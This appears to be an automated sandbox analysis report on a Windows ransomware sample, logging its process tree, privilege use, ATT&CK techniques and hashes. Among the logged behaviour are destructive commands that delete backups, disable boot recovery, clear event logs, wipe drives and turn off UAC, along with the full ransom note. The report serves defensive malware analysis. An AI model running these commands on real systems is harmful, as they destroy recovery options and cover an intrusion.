\REGISTRY\MACHINE\Software\Classes\exefile\shell\open\command powercfg.exe -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 6876 PING.EXE -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 2160 YOURDATA.exe 2160 YOURDATA.exe 2580 YOURDATA.exe 2580 YOURDATA.exe 2900 YOURDATA.exe 2900 YOURDATA.exe 2900 YOURDATA.exe 2900 YOURDATA.exe 2900 YOURDATA.exe 2900 YOURDATA.exe 2900 YOURDATA.exe 2900 YOURDATA.exe 2900 YOURDATA.exe 2900 YOURDATA.exe 2900 YOURDATA.exe 2900 YOURDATA.exe 2900 YOURDATA.exe 2900 YOURDATA.exe 2900 YOURDATA.exe 2900 YOURDATA.exe 2900 YOURDATA.exe 2900 YOURDATA.exe 2900 YOURDATA.exe 2900 YOURDATA.exe 2900 YOURDATA.exe 2900 YOURDATA.exe 2900 YOURDATA.exe 2900 YOURDATA.exe 2900 YOURDATA.exe 2900 YOURDATA.exe 2900 YOURDATA.exe 2900 YOURDATA.exe 2900 YOURDATA.exe 2900 YOURDATA.exe 2900 YOURDATA.exe 2900 YOURDATA.exe 1120 powershell.exe 1120 powershell.exe 2024 powershell.exe 2024 powershell.exe 4092 Conhost.exe 4092 Conhost.exe 1120 powershell.exe 2024 powershell.exe 4092 Conhost.exe 2160 YOURDATA.exe 2160 YOURDATA.exe 2160 YOURDATA.exe 2160 YOURDATA.exe 2160 YOURDATA.exe 2160 YOURDATA.exe 2160 YOURDATA.exe 2160 YOURDATA.exe 2160 YOURDATA.exe 2160 YOURDATA.exe 2160 YOURDATA.exe 2160 YOURDATA.exe 2160 YOURDATA.exe 2160 YOURDATA.exe 2160 YOURDATA.exe 2160 YOURDATA.exe 2160 YOURDATA.exe 2160 YOURDATA.exe 2160 YOURDATA.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeRestorePrivilege 2808 7za.exe Token: 35 2808 7za.exe Token: SeRestorePrivilege 4208 7za.exe Token: 35 4208 7za.exe Token: SeSecurityPrivilege 4208 7za.exe Token: SeSecurityPrivilege 4208 7za.exe Token: SeIncreaseQuotaPrivilege 3700 powercfg.exe Token: SeSecurityPrivilege 3700 powercfg.exe Token: SeTakeOwnershipPrivilege 3700 powercfg.exe Token: SeLoadDriverPrivilege 3700 powercfg.exe Token: SeSystemProfilePrivilege 3700 powercfg.exe Token: SeSystemtimePrivilege 3700 powercfg.exe Token: SeProfSingleProcessPrivilege 3700 powercfg.exe Token: SeIncBasePriorityPrivilege 3700 powercfg.exe Token: SeCreatePagefilePrivilege 3700 powercfg.exe Token: SeBackupPrivilege 3700 powercfg.exe Token: SeRestorePrivilege 3700 powercfg.exe Token: SeShutdownPrivilege 3700 powercfg.exe Token: SeDebugPrivilege 3700 powercfg.exe Token: SeSystemEnvironmentPrivilege 3700 powercfg.exe Token: SeChangeNotifyPrivilege 3700 powercfg.exe Token: SeRemoteShutdownPrivilege 3700 powercfg.exe Token: SeUndockPrivilege 3700 powercfg.exe Token: SeManageVolumePrivilege 3700 powercfg.exe Token: SeImpersonatePrivilege 3700 powercfg.exe Token: SeCreateGlobalPrivilege 3700 powercfg.exe Token: 33 3700 powercfg.exe Token: 34 3700 powercfg.exe Token: 35 3700 powercfg.exe Token: 36 3700 powercfg.exe Token: SeIncreaseQuotaPrivilege 2900 YOURDATA.exe Token: SeSecurityPrivilege 2900 YOURDATA.exe Token: SeTakeOwnershipPrivilege 2900 YOURDATA.exe Token: SeLoadDriverPrivilege 2900 YOURDATA.exe Token: SeSystemProfilePrivilege 2900 YOURDATA.exe Token: SeSystemtimePrivilege 2900 YOURDATA.exe Token: SeProfSingleProcessPrivilege 2900 YOURDATA.exe Token: SeIncBasePriorityPrivilege 2900 YOURDATA.exe Token: SeCreatePagefilePrivilege 2900 YOURDATA.exe Token: SeBackupPrivilege 2900 YOURDATA.exe Token: SeRestorePrivilege 2900 YOURDATA.exe Token: SeShutdownPrivilege 2900 YOURDATA.exe Token: SeDebugPrivilege 2900 YOURDATA.exe Token: SeSystemEnvironmentPrivilege 2900 YOURDATA.exe Token: SeChangeNotifyPrivilege 2900 YOURDATA.exe Token: SeRemoteShutdownPrivilege 2900 YOURDATA.exe Token: SeUndockPrivilege 2900 YOURDATA.exe Token: SeManageVolumePrivilege 2900 YOURDATA.exe Token: SeImpersonatePrivilege 2900 YOURDATA.exe Token: SeCreateGlobalPrivilege 2900 YOURDATA.exe Token: 33 2900 YOURDATA.exe Token: 34 2900 YOURDATA.exe Token: 35 2900 YOURDATA.exe Token: 36 2900 YOURDATA.exe Token: SeIncreaseQuotaPrivilege 1744 YOURDATA.exe Token: SeIncreaseQuotaPrivilege 2160 YOURDATA.exe Token: SeSecurityPrivilege 1744 YOURDATA.exe Token: SeSecurityPrivilege 2160 YOURDATA.exe Token: SeTakeOwnershipPrivilege 1744 YOURDATA.exe Token: SeTakeOwnershipPrivilege 2160 YOURDATA.exe Token: SeLoadDriverPrivilege 1744 YOURDATA.exe Token: SeLoadDriverPrivilege 2160 YOURDATA.exe Token: SeSystemProfilePrivilege 1744 YOURDATA.exe Token: SeSystemProfilePrivilege 2160 YOURDATA.exe -
Suspicious use of SetWindowsHookEx 2 IoCs
pid Process 3860 Everything.exe 4468 Everything.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2640 wrote to memory of 2808 2640 Process not Found 32 PID 2640 wrote to memory of 2808 2640 Process not Found 32 PID 2640 wrote to memory of 2808 2640 Process not Found 32 PID 2640 wrote to memory of 4208 2640 Process not Found 31 PID 2640 wrote to memory of 4208 2640 Process not Found 31 PID 2640 wrote to memory of 4208 2640 Process not Found 31 PID 2640 wrote to memory of 3700 2640 Process not Found 158 PID 2640 wrote to memory of 3700 2640 Process not Found 158 PID 2640 wrote to memory of 3700 2640 Process not Found 158 PID 3700 wrote to memory of 2900 3700 powercfg.exe 51 PID 3700 wrote to memory of 2900 3700 powercfg.exe 51 PID 3700 wrote to memory of 2900 3700 powercfg.exe 51 PID 2900 wrote to memory of 4800 2900 YOURDATA.exe 59 PID 2900 wrote to memory of 4800 2900 YOURDATA.exe 59 PID 2900 wrote to memory of 4800 2900 YOURDATA.exe 59 PID 4800 wrote to memory of 316 4800 cmd.exe 60 PID 4800 wrote to memory of 316 4800 cmd.exe 60 PID 4800 wrote to memory of 316 4800 cmd.exe 60 PID 2900 wrote to memory of 1744 2900 YOURDATA.exe 67 PID 2900 wrote to memory of 1744 2900 YOURDATA.exe 67 PID 2900 wrote to memory of 1744 2900 YOURDATA.exe 67 PID 2900 wrote to memory of 2160 2900 YOURDATA.exe 65 PID 2900 wrote to memory of 2160 2900 YOURDATA.exe 65 PID 2900 wrote to memory of 2160 2900 YOURDATA.exe 65 PID 2900 wrote to memory of 2580 2900 YOURDATA.exe 66 PID 2900 wrote to memory of 2580 2900 YOURDATA.exe 66 PID 2900 wrote to memory of 2580 2900 YOURDATA.exe 66 PID 2900 wrote to memory of 3860 2900 YOURDATA.exe 109 PID 2900 wrote to memory of 3860 2900 YOURDATA.exe 109 PID 2900 wrote to memory of 3860 2900 YOURDATA.exe 109 PID 2640 wrote to memory of 2136 2640 Process not Found 111 PID 2640 wrote to memory of 2136 2640 Process not Found 111 PID 2640 wrote to memory of 2136 2640 Process not Found 111 PID 2900 wrote to memory of 1660 2900 YOURDATA.exe 163 PID 2900 wrote to memory of 1660 2900 YOURDATA.exe 163 PID 2900 wrote to memory of 1656 2900 YOURDATA.exe 162 PID 2900 wrote to memory of 1656 2900 YOURDATA.exe 162 PID 2900 wrote to memory of 2360 2900 YOURDATA.exe 161 PID 2900 wrote to memory of 2360 2900 YOURDATA.exe 161 PID 2900 wrote to memory of 4832 2900 YOURDATA.exe 160 PID 2900 wrote to memory of 4832 2900 YOURDATA.exe 160 PID 2900 wrote to memory of 2128 2900 YOURDATA.exe 159 PID 2900 wrote to memory of 2128 2900 YOURDATA.exe 159 PID 2900 wrote to memory of 3700 2900 YOURDATA.exe 158 PID 2900 wrote to memory of 3700 2900 YOURDATA.exe 158 PID 2900 wrote to memory of 3260 2900 YOURDATA.exe 157 PID 2900 wrote to memory of 3260 2900 YOURDATA.exe 157 PID 2900 wrote to memory of 4628 2900 YOURDATA.exe 156 PID 2900 wrote to memory of 4628 2900 YOURDATA.exe 156 PID 2900 wrote to memory of 4860 2900 YOURDATA.exe 155 PID 2900 wrote to memory of 4860 2900 YOURDATA.exe 155 PID 2900 wrote to memory of 852 2900 YOURDATA.exe 154 PID 2900 wrote to memory of 852 2900 YOURDATA.exe 154 PID 2900 wrote to memory of 2440 2900 YOURDATA.exe 153 PID 2900 wrote to memory of 2440 2900 YOURDATA.exe 153 PID 2900 wrote to memory of 3560 2900 YOURDATA.exe 152 PID 2900 wrote to memory of 3560 2900 YOURDATA.exe 152 PID 2900 wrote to memory of 3956 2900 YOURDATA.exe 151 PID 2900 wrote to memory of 3956 2900 YOURDATA.exe 151 PID 2900 wrote to memory of 4112 2900 YOURDATA.exe 178 PID 2900 wrote to memory of 4112 2900 YOURDATA.exe 178 PID 2900 wrote to memory of 2172 2900 YOURDATA.exe 149 PID 2900 wrote to memory of 2172 2900 YOURDATA.exe 149 PID 2900 wrote to memory of 2024 2900 YOURDATA.exe 148 -
System policy modification 1 TTPs 13 IoCs
description ioc Process Key created \REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer YOURDATA.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\HidePowerOptions = "1" YOURDATA.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System YOURDATA.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\shutdownwithoutlogon = "0" YOURDATA.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\DataCollection YOURDATA.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\legalnoticecaption = " " YOURDATA.exe Key created \REGISTRY\MACHINE\SOFTWARE\MICROSOFT\Windows\CurrentVersion\Policies\System YOURDATA.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" YOURDATA.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" YOURDATA.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\legalnoticetext = "Your data on your system has been encrypted by us....\n\nWe want you to know that you will not get your data back with the usual data recovery methods...\n\nWe will restore your data for 3000 dollars.\n\nYou can send an e-mail with your reference code below\n\nWe Do Not Negotiate \nWe do not give discounts.\nThe price is very reasonable\n\n\n######################################################################\n\nIf you contact me to ask for a discount or to negotiate, I will increase the price I offer.\n\n######################################################################\n\nWhen you send us an e-mail, please send us your reference code below\n\n=> YOUR REFERENCE CODE <=\n\nRxmvGvlaThNICz1BDBE_KR5MOgbZqLg8MLUOm-PPBBk*[email protected]\n\n=> OUR E-MAIL ADDRESS <=\n\[email protected]\[email protected]\[email protected]" YOURDATA.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\DataCollection\AllowTelemetry = "0" YOURDATA.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorUser = "0" YOURDATA.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" YOURDATA.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Users\Admin\AppData\Local\Temp\a8759b39cecf17631e9d4952aecd32ce233e01d08841178e7ef81f3afdd8e455.exe"C:\Users\Admin\AppData\Local\Temp\a8759b39cecf17631e9d4952aecd32ce233e01d08841178e7ef81f3afdd8e455.exe"1⤵PID:2640
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\7za.exe"C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\7za.exe" x -y -p58042791667523172 Everything64.dll2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4208
-
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\7za.exe"C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\7za.exe" i2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2808
-
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\3usdaa.exe"C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\3usdaa.exe"2⤵PID:3700
-
C:\Users\Admin\AppData\Local\{3E72089C-1A3A-DF6C-7071-175DF7BCDA76}\YOURDATA.exe"C:\Users\Admin\AppData\Local\{3E72089C-1A3A-DF6C-7071-175DF7BCDA76}\YOURDATA.exe"3⤵
- UAC bypass
- Sets file execution options in registry
- Executes dropped EXE
- Loads dropped DLL
- Modifies system executable filetype association
- Adds Run key to start application
- Checks whether UAC is enabled
- Drops file in Program Files directory
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
- System policy modification
PID:2900 -
C:\Windows\SysWOW64\cmd.execmd.exe /c DC.exe /D4⤵
- Suspicious use of WriteProcessMemory
PID:4800 -
C:\Users\Admin\AppData\Local\{3E72089C-1A3A-DF6C-7071-175DF7BCDA76}\DC.exeDC.exe /D5⤵
- Executes dropped EXE
PID:316
-
-
-
C:\Users\Admin\AppData\Local\{3E72089C-1A3A-DF6C-7071-175DF7BCDA76}\YOURDATA.exe"C:\Users\Admin\AppData\Local\{3E72089C-1A3A-DF6C-7071-175DF7BCDA76}\YOURDATA.exe" -e ul14⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2160
-
-
C:\Users\Admin\AppData\Local\{3E72089C-1A3A-DF6C-7071-175DF7BCDA76}\YOURDATA.exe"C:\Users\Admin\AppData\Local\{3E72089C-1A3A-DF6C-7071-175DF7BCDA76}\YOURDATA.exe" -e ul24⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
PID:2580
-
-
C:\Users\Admin\AppData\Local\{3E72089C-1A3A-DF6C-7071-175DF7BCDA76}\YOURDATA.exe"C:\Users\Admin\AppData\Local\{3E72089C-1A3A-DF6C-7071-175DF7BCDA76}\YOURDATA.exe" -e watch -pid 2900 -!4⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:1744
-
-
C:\Users\Admin\AppData\Local\{3E72089C-1A3A-DF6C-7071-175DF7BCDA76}\Everything.exe"C:\Users\Admin\AppData\Local\{3E72089C-1A3A-DF6C-7071-175DF7BCDA76}\Everything.exe" -startup4⤵
- Executes dropped EXE
- Enumerates connected drives
- Suspicious use of SetWindowsHookEx
PID:3860
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -ExecutionPolicy Bypass "Get-Volume | Get-DiskImage | Dismount-DiskImage"4⤵
- Suspicious behavior: EnumeratesProcesses
PID:1120
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -ExecutionPolicy Bypass "Get-VM | Select-Object vmid | Get-VHD | %{Get-DiskImage -ImagePath $_.Path; Get-DiskImage -ImagePath $_.ParentPath} | Dismount-DiskImage"4⤵PID:4092
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -ExecutionPolicy Bypass "Get-VM | Stop-VM"4⤵
- Suspicious behavior: EnumeratesProcesses
PID:2024
-
-
C:\Windows\SYSTEM32\powercfg.exepowercfg.exe -S e9a42b02-d5df-448d-aa00-03f14749eb614⤵PID:2172
-
-
C:\Windows\SYSTEM32\powercfg.exepowercfg.exe -S 8c5e7fda-e8bf-4a96-9a85-a6e23a8c635c4⤵PID:4112
-
-
C:\Windows\SYSTEM32\powercfg.exepowercfg.exe -SETDCVALUEINDEX e9a42b02-d5df-448d-aa00-03f14749eb61 4f971e89-eebd-4455-a8de-9e59040e7347 5ca83367-6e45-459f-a27b-476b1d01c936 04⤵PID:3956
-
-
C:\Windows\SYSTEM32\powercfg.exepowercfg.exe -SETDCVALUEINDEX e9a42b02-d5df-448d-aa00-03f14749eb61 4f971e89-eebd-4455-a8de-9e59040e7347 96996bc0-ad50-47ec-923b-6f41874dd9eb 04⤵PID:3560
-
-
C:\Windows\SYSTEM32\powercfg.exepowercfg.exe -SETDCVALUEINDEX e9a42b02-d5df-448d-aa00-03f14749eb61 4f971e89-eebd-4455-a8de-9e59040e7347 7648efa3-dd9c-4e3e-b566-50f929386280 04⤵PID:2440
-
-
C:\Windows\SYSTEM32\powercfg.exepowercfg.exe -SETACVALUEINDEX e9a42b02-d5df-448d-aa00-03f14749eb61 4f971e89-eebd-4455-a8de-9e59040e7347 5ca83367-6e45-459f-a27b-476b1d01c936 04⤵PID:852
-
-
C:\Windows\SYSTEM32\powercfg.exepowercfg.exe -SETACVALUEINDEX e9a42b02-d5df-448d-aa00-03f14749eb61 4f971e89-eebd-4455-a8de-9e59040e7347 96996bc0-ad50-47ec-923b-6f41874dd9eb 04⤵PID:4860
-
-
C:\Windows\SYSTEM32\powercfg.exepowercfg.exe -SETACVALUEINDEX e9a42b02-d5df-448d-aa00-03f14749eb61 4f971e89-eebd-4455-a8de-9e59040e7347 7648efa3-dd9c-4e3e-b566-50f929386280 04⤵PID:4628
-
-
C:\Windows\SYSTEM32\powercfg.exepowercfg.exe -SETDCVALUEINDEX 8c5e7fda-e8bf-4a96-9a85-a6e23a8c635c 4f971e89-eebd-4455-a8de-9e59040e7347 5ca83367-6e45-459f-a27b-476b1d01c936 04⤵PID:3260
-
-
C:\Windows\SYSTEM32\powercfg.exepowercfg.exe -SETDCVALUEINDEX 8c5e7fda-e8bf-4a96-9a85-a6e23a8c635c 4f971e89-eebd-4455-a8de-9e59040e7347 96996bc0-ad50-47ec-923b-6f41874dd9eb 04⤵
- Executes dropped EXE
- Loads dropped DLL
- Modifies system executable filetype association
- Adds Run key to start application
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3700
-
-
C:\Windows\SYSTEM32\powercfg.exepowercfg.exe -SETDCVALUEINDEX 8c5e7fda-e8bf-4a96-9a85-a6e23a8c635c 4f971e89-eebd-4455-a8de-9e59040e7347 7648efa3-dd9c-4e3e-b566-50f929386280 04⤵PID:2128
-
-
C:\Windows\SYSTEM32\powercfg.exepowercfg.exe -SETACVALUEINDEX 8c5e7fda-e8bf-4a96-9a85-a6e23a8c635c 4f971e89-eebd-4455-a8de-9e59040e7347 5ca83367-6e45-459f-a27b-476b1d01c936 04⤵PID:4832
-
-
C:\Windows\SYSTEM32\powercfg.exepowercfg.exe -SETACVALUEINDEX 8c5e7fda-e8bf-4a96-9a85-a6e23a8c635c 4f971e89-eebd-4455-a8de-9e59040e7347 96996bc0-ad50-47ec-923b-6f41874dd9eb 04⤵PID:2360
-
-
C:\Windows\SYSTEM32\powercfg.exepowercfg.exe -SETACVALUEINDEX 8c5e7fda-e8bf-4a96-9a85-a6e23a8c635c 4f971e89-eebd-4455-a8de-9e59040e7347 7648efa3-dd9c-4e3e-b566-50f929386280 04⤵PID:1656
-
-
C:\Windows\SYSTEM32\powercfg.exepowercfg.exe -H off4⤵PID:1660
-
-
C:\Windows\SYSTEM32\wbadmin.exewbadmin.exe delete catalog -quiet4⤵
- Deletes backup catalog
PID:3024
-
-
C:\Windows\SYSTEM32\wbadmin.exewbadmin.exe DELETE SYSTEMSTATEBACKUP4⤵
- Deletes System State backups
- Drops file in Windows directory
PID:5816
-
-
C:\Windows\SYSTEM32\bcdedit.exebcdedit.exe /set {default} recoveryenabled no4⤵
- Modifies boot configuration data using bcdedit
PID:5736
-
-
C:\Windows\SYSTEM32\bcdedit.exebcdedit.exe /set {default} bootstatuspolicy ignoreallfailures4⤵
- Modifies boot configuration data using bcdedit
PID:5796
-
-
C:\Users\Admin\AppData\Local\{3E72089C-1A3A-DF6C-7071-175DF7BCDA76}\Everything.exe"C:\Users\Admin\AppData\Local\{3E72089C-1A3A-DF6C-7071-175DF7BCDA76}\Everything.exe" -startup4⤵
- Executes dropped EXE
- Enumerates connected drives
- Suspicious use of SetWindowsHookEx
PID:4468
-
-
C:\Users\Admin\AppData\Local\{3E72089C-1A3A-DF6C-7071-175DF7BCDA76}\xdel.exe"C:\Users\Admin\AppData\Local\{3E72089C-1A3A-DF6C-7071-175DF7BCDA76}\xdel.exe" -accepteula -p 1 -c F:\4⤵
- Executes dropped EXE
PID:3672
-
-
C:\Users\Admin\AppData\Local\{3E72089C-1A3A-DF6C-7071-175DF7BCDA76}\xdel.exe"C:\Users\Admin\AppData\Local\{3E72089C-1A3A-DF6C-7071-175DF7BCDA76}\xdel.exe" -accepteula -p 1 -c C:\4⤵
- Executes dropped EXE
PID:3696
-
-
C:\Windows\SysWOW64\notepad.exenotepad.exe "C:\Users\Admin\AppData\Local\----Read-Me-----.txt"4⤵PID:5192
-
-
C:\Windows\SysWOW64\wevtutil.exewevtutil.exe cl security4⤵
- Clears Windows event logs
PID:1536
-
-
C:\Windows\SysWOW64\wevtutil.exewevtutil.exe cl application4⤵
- Clears Windows event logs
PID:5612
-
-
C:\Windows\SysWOW64\wevtutil.exewevtutil.exe cl system4⤵
- Clears Windows event logs
PID:6600
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /d /c "ping 127.2 -n 5 & fsutil file setZeroData offset=0 length=20000000 "C:\Users\Admin\AppData\Local\{3E72089C-1A3A-DF6C-7071-175DF7BCDA76}\YOURDATA.exe" & cd /d "C:\Users\Admin\AppData\Local\{3E72089C-1A3A-DF6C-7071-175DF7BCDA76}" & Del /f /q /a *.exe *.ini *.dll *.bat *.db"4⤵PID:6020
-
C:\Windows\SysWOW64\PING.EXEping 127.2 -n 55⤵
- Runs ping.exe
PID:6876
-
-
C:\Windows\SysWOW64\fsutil.exefsutil file setZeroData offset=0 length=20000000 "C:\Users\Admin\AppData\Local\{3E72089C-1A3A-DF6C-7071-175DF7BCDA76}\YOURDATA.exe"5⤵PID:2020
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\7ZSfx000.cmd" "2⤵PID:2136
-
-
C:\Windows\System32\Systray.exeC:\Windows\System32\Systray.exe "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca1⤵PID:876
-
C:\Windows\System32\Systray.exeC:\Windows\System32\Systray.exe "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca1⤵PID:1172
-
C:\Windows\System32\Systray.exeC:\Windows\System32\Systray.exe "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca1⤵PID:4136
-
C:\Windows\System32\Systray.exeC:\Windows\System32\Systray.exe "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca1⤵PID:4604
-
C:\Windows\System32\Systray.exeC:\Windows\System32\Systray.exe "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca1⤵PID:5060
-
C:\Windows\System32\Systray.exeC:\Windows\System32\Systray.exe "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca1⤵PID:1788
-
C:\Windows\System32\Systray.exeC:\Windows\System32\Systray.exe "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca1⤵PID:5080
-
C:\Windows\System32\Systray.exeC:\Windows\System32\Systray.exe "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca1⤵PID:1936
-
C:\Windows\System32\Systray.exeC:\Windows\System32\Systray.exe "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca1⤵PID:4548
-
C:\Windows\System32\Systray.exeC:\Windows\System32\Systray.exe "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca1⤵PID:8
-
C:\Windows\System32\Systray.exeC:\Windows\System32\Systray.exe "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca1⤵PID:6512
-
C:\Windows\System32\Systray.exeC:\Windows\System32\Systray.exe "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca1⤵PID:7024
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵PID:5716
-
C:\Windows\System32\vds.exeC:\Windows\System32\vds.exe1⤵
- Checks SCSI registry key(s)
PID:4112
-
C:\Windows\System32\vdsldr.exeC:\Windows\System32\vdsldr.exe -Embedding1⤵PID:6480
-
C:\Windows\system32\wbengine.exe"C:\Windows\system32\wbengine.exe"1⤵PID:5988
-
C:\Windows\System32\Systray.exeC:\Windows\System32\Systray.exe "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca1⤵PID:1276
-
C:\Windows\System32\Systray.exeC:\Windows\System32\Systray.exe "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca1⤵PID:2716
-
C:\Windows\System32\Systray.exeC:\Windows\System32\Systray.exe "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca1⤵PID:3944
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV11⤵
- Suspicious behavior: EnumeratesProcesses
PID:4092
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
2Registry Run Keys / Startup Folder
2Event Triggered Execution
1Change Default File Association
1Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Boot or Logon Autostart Execution
2Registry Run Keys / Startup Folder
2Event Triggered Execution
1Change Default File Association
1Defense Evasion
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Impair Defenses
1Disable or Modify Tools
1Indicator Removal
3File Deletion
2Modify Registry
5Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
846B
MD5839a3e5f4ac66d267dbf726f71cfc115
SHA1c261ee5ffa6cb0845709654fa3e582fa68c3ed1f
SHA2569e9e460bce9e3e800e4bbbefd0a1cee4d5718f324bff8217f562896116e6411d
SHA5122389536c067977eed0e8cde89f25c201203cd455a53240d05caa8dfb4c5176368fd6a7bdf9bd5227b49161f4e36d9a17c4031049d5753aee46f0ed7fd8e48b9d
-
Filesize
2KB
MD5d85ba6ff808d9e5444a4b369f5bc2730
SHA131aa9d96590fff6981b315e0b391b575e4c0804a
SHA25684739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA5128c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249
-
Filesize
944B
MD56d42b6da621e8df5674e26b799c8e2aa
SHA1ab3ce1327ea1eeedb987ec823d5e0cb146bafa48
SHA2565ab6a1726f425c6d0158f55eb8d81754ddedd51e651aa0a899a29b7a58619c4c
SHA51253faffbda8a835bc1143e894c118c15901a5fd09cfc2224dd2f754c06dc794897315049a579b9a8382d4564f071576045aaaf824019b7139d939152dca38ce29
-
Filesize
1KB
MD5755e01dde3ca995ae926b19c20d1cf27
SHA1f36ff7aed1cb8b099559e25f74abf2f70b66d3dd
SHA25609dd73f04765551a00bc3e4767fe5a7c05ad6bbf155a7ab41c04384b7db851ef
SHA5129306964f08e81f8867cd370c5c090f8ed9fb0f5ac791c795968091dd9eb5fbb52854e757ea71925c34071feae202405d942d710f08ded49206255b2542051d4f
-
Filesize
300B
MD5e1a82f783e5da276aaee7cd82b8f0634
SHA108ee4d34971a8a1d237b9fb44025b75552c25ab1
